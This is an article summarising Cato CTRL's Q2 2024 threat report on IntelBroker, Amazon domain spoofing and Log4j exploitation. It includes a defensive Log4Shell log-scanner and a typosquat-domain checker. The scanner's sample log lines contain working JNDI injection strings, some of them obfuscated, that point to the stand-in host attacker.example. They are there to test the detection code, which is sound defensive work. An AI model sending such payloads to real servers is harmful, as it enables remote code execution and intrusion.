Cato CTRL (Cyber Threats Research Lab) recently unveiled its Q2 2024 SASE Threat Report, offering a comprehensive overview of cybersecurity risks based on data from over 1.38 trillion network flows across more than 2,500 global customers. The report, covering the period from April to June 2024, provides critical insights into emerging threats and security trends.
1. IntelBroker: A Persistent Threat in the Cyber Underground
Cato CTRL's deep investigation into hacking communities, particularly the dark web, has uncovered the activities of a notorious threat actor known as IntelBroker. A key figure within the BreachForums hacking community, IntelBroker has been actively involved in selling data and source code from high-profile organizations. These victims include companies such as AMD, Apple, Facebook, KrypC, Microsoft, Space-Eyes, T-Mobile, and even the US Army Aviation and Missile Command. IntelBroker’s operations highlight the significant risks posed by underground marketplaces where stolen corporate data is frequently traded.
2. Brand Spoofing: 66% of Spoofed Domains Target Amazon
One of the most alarming trends identified in the report is the rise of cybersquatting, where threat actors spoof domain names to profit from brand trademarks. Amazon has emerged as the most spoofed brand, accounting for a staggering 66% of all spoofed domains. Google follows, though at a much lower rate of 7%. This trend underscores the growing challenge companies face in safeguarding their digital identity and preventing phishing attacks that exploit these fake domains.
3. Log4j: Still a Major Threat
Even though it was discovered in 2021, the Log4j vulnerability continues to be a tool of choice for cybercriminals. Cato CTRL reports a 61% increase in attempted Log4j exploits in inbound traffic and a 79% rise in WANbound traffic between Q1 and Q2 2024. Additionally, there has been a sharp 114% surge in exploitation attempts targeting the Oracle WebLogic vulnerability (discovered in 2020) in WANbound traffic. These numbers reflect the persistence of older vulnerabilities and the need for organizations to prioritize timely patching.
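The exploitation attempts the report counts are visible to defenders as JNDI lookup strings in request headers or paths. The following detector is an added example, not code from Cato CTRL or from the report; it scans constructed access-log lines (the hostnames, addresses and timestamps are made up) after percent-decoding them and unfolding the common `${lower:...}`, `${upper:...}` and `${...:-x}` nesting tricks, so that obfuscated lookups collapse back to a plain `${jndi:scheme:...}` form before matching. The normalizer only handles those three forms; a production rule set would cover more.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Lines 1-3 carry
# Log4Shell-style JNDI lookups in the User-Agent or query string, line 5
# carries a non-JNDI lookup that should not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Jun/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [12/Jun/2024:10:01:03 +0000] "GET /login?user=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 200 88 "-" "curl/8.0"',
    '10.0.0.7 - - [12/Jun/2024:10:01:04 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '10.0.0.8 - - [12/Jun/2024:10:01:05 +0000] "GET /health HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jun/2024:10:01:06 +0000] "GET /docs?q=${env:HOME} HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
]

# Innermost lookups only (no nested braces inside), resolved from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalization a JNDI lookup looks like ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Unfold ${lower:x}, ${upper:x} and ${key:-x} until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line: str) -> list:
    """Return the sorted JNDI schemes (ldap, rmi, dns, ...) found in a log line."""
    decoded = unquote(line)  # %24%7B... -> ${...
    # Match both before and after unfolding, so a default-value pattern inside
    # a plain lookup cannot hide it from the detector.
    found = set(_JNDI.findall(decoded)) | set(_JNDI.findall(normalize_lookups(decoded)))
    return sorted(s.lower() for s in found)


def scan_log(lines: list) -> list:
    """Return (line_number, source_ip, schemes) for every line with a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        schemes = find_jndi_lookups(line)
        if schemes:
            source_ip = line.split(" ", 1)[0]
            hits.append((number, source_ip, schemes))
    return hits


if __name__ == "__main__":
    for number, source_ip, schemes in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup from {source_ip} via {', '.join(schemes)}")
```

Run against the sample lines it reports lines 1 to 3 and stays silent on the benign `${env:HOME}` lookup; a real deployment would feed it the raw request line and all headers, not just the fields a default access-log format records.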
Security Recommendations for Enterprises
To mitigate these ongoing threats, Cato CTRL offers several security recommendations:
- Monitor Dark Web: Continuously watch for mentions of your company’s data being traded on the dark web or hacking forums.
- Brand Protection: Implement tools to detect and prevent brand spoofing and cybersquatting attacks.
- Proactive Patching: Establish a regular patching schedule, focusing on critical vulnerabilities like Log4j.
- Incident Response Plans: Develop a detailed plan for responding to data breaches.
- "Assume Breach" Mindset: Adopt security approaches such as Zero Trust Network Access (ZTNA), Extended Detection and Response (XDR), and regular penetration testing.
- AI Governance: Ensure that AI tools and systems are governed effectively to prevent security risks.
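The cybersquatting trend in section 2 and the brand-protection recommendation above both come down to spotting registered domains that imitate a brand. The checker below is an added example, not code from Cato CTRL or any brand-protection product; it takes a constructed list of candidate domains (as a defender might pull from a newly-registered-domain feed or certificate transparency logs), strips a small set of digit and letter-pair homoglyphs, and flags a domain when its registrable label embeds a protected brand or sits within one edit (including an adjacent transposition) of it. The brand list and owned-domain allowlist are assumptions for the example, and the registrable-label split is a simplification that a real system would replace with the Public Suffix List.

```python
# Assumed inputs for the example: the brands named in the report and the
# domains we treat as legitimately owned (allowlisted, never flagged).
BRANDS = ["amazon", "google"]
OWNED_DOMAINS = {"amazon.com", "google.com"}

# Constructed candidate domains, e.g. from a new-registration feed (not real data).
CANDIDATE_DOMAINS = [
    "amazon.com",            # owned, skipped
    "amaz0n-login.com",      # digit homoglyph + embedded brand
    "arnazon.net",           # 'rn' imitates 'm'
    "amazn.co",              # one character dropped
    "google.com",            # owned, skipped
    "g00gle-support.org",    # digit homoglyphs + embedded brand
    "example.org",           # unrelated, clean
]

# Multi-character substitutions run first so 'rn' is folded before single chars.
_HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize_homoglyphs(label: str) -> str:
    """Fold common look-alike characters into the letters they imitate."""
    label = label.lower()
    for fake, real in _HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def registrable_label(domain: str) -> str:
    """Second-level label; simplification of a Public Suffix List lookup."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(domain: str, brands=BRANDS, owned=OWNED_DOMAINS) -> list:
    """Return the reasons a domain looks like a brand imitation (empty if none)."""
    domain = domain.lower()
    if domain in owned or any(domain.endswith("." + o) for o in owned):
        return []
    label = normalize_homoglyphs(registrable_label(domain))
    reasons = []
    for brand in brands:
        if brand in label:
            reasons.append(f"embeds brand '{brand}' after homoglyph folding")
        elif osa_distance(label, brand) <= 1:
            reasons.append(f"within one edit of brand '{brand}'")
    return reasons


def scan_domains(domains, brands=BRANDS, owned=OWNED_DOMAINS) -> list:
    """Return (domain, reasons) for every candidate that matches a brand."""
    return [(d, classify(d, brands, owned)) for d in domains if classify(d, brands, owned)]


if __name__ == "__main__":
    for domain, reasons in scan_domains(CANDIDATE_DOMAINS):
        print(f"{domain}: {'; '.join(reasons)}")
```

The edit-distance threshold of one keeps false positives down for short brand names; for longer brands a threshold of two is common, and any hit is a lead for takedown or blocklisting, not proof of abuse on its own (the homoglyph folding will also touch legitimate words containing "rn").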
The Q2 2024 report serves as a timely reminder for organizations to stay vigilant and proactive in their cybersecurity efforts, especially in addressing long-standing vulnerabilities and emerging threats like cybersquatting.